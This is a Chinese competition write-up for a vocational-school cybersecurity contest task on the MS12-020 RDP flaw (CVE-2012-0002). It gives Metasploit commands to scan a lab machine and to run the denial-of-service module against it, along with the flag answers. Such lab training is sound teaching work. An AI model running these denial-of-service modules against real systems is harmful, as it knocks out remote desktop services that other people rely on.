中职网络安全2022国赛之MS12020漏洞扫描与利用(CVE-2012-0002)

简介

我做了一个简单的环境来复现这个漏洞,需要虚拟机环境的可以加我qq:3316735898,有什么不会的也可以问我
中职网络安全2022国赛之MS12020漏洞扫描与利用(CVE-2012-0002)_第1张图片

1.在MSF工具中用search命令搜索MS12020 RDP拒绝服务攻击模块,将回显结果中的漏洞披露时间作为Flag值(如:2012-10-16)提交

搜索漏洞模块:

search ms12-020

中职网络安全2022国赛之MS12020漏洞扫描与利用(CVE-2012-0002)_第2张图片
时间为:

2012-03-16

2.在MSF工具中调用MS12020 RDP拒绝服务漏洞的辅助扫描模块,将调用此模块的命令作为Flag值提交

use

3.使用set命令设置目标IP,并检测靶机是否存在漏洞,运行此模块,将回显结果中倒数第2行的最后一个单词作为Flag值提交

use auxiliary/scanner/rdp/ms12_020_check

中职网络安全2022国赛之MS12020漏洞扫描与利用(CVE-2012-0002)_第3张图片

set rhosts 192.168.0.105
run

中职网络安全2022国赛之MS12020漏洞扫描与利用(CVE-2012-0002)_第4张图片
回显结果中倒数第2行的最后一个单词为:

complete

4.在MSF工具中调用并运行MS12020 RDP拒绝服务漏洞的攻击模块,将运行此模块后回显结果中倒数第1行的最后一个单词作为Flag值提交

use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
set rhosts 192.168.0.105
run

在这里插入图片描述
回显结果中倒数第1行的最后一个单词为:

completed

5.进入靶机关闭远程桌面服务,再次运行MS12020RDP拒绝服务漏洞的攻击模块,运行此模块并将回显结果中倒数第2行的最后一个单词作为Flag值提交

右击计算机,选择属性,选择远程管理,关闭远程登录
中职网络安全2022国赛之MS12020漏洞扫描与利用(CVE-2012-0002)_第5张图片
中职网络安全2022国赛之MS12020漏洞扫描与利用(CVE-2012-0002)_第6张图片
回到kali

run

在这里插入图片描述
回显结果中倒数第2行的最后一个单词为

Unreachable

总结

Microsoft Windows操作系统是目前使用最广泛的操作系统之一,其远程桌面协议(Remote Desktop Protocol)被广泛用于用户远程管理计算机。近期在Windows操作系统的远程桌面协议中(Remote Desktop Protocol)被发现存在一个远程代码可执行漏洞,在Windows XP *、Windows Server 2003 *以及未开启网络层认证(Network Level Authentication)的Windows Vista *、Windows Server 2008 *和Windows 7 *中,只要操作系统开启Remote Desktop Protocol (RDP)服务,远程攻击者在未经认证的情况下往服务器发送畸形恶意的数据包,便可以以系统权限或者NET SERVICE权限执行任意命令

你可能感兴趣的:(中职网安比赛,安全,经验分享,网络安全)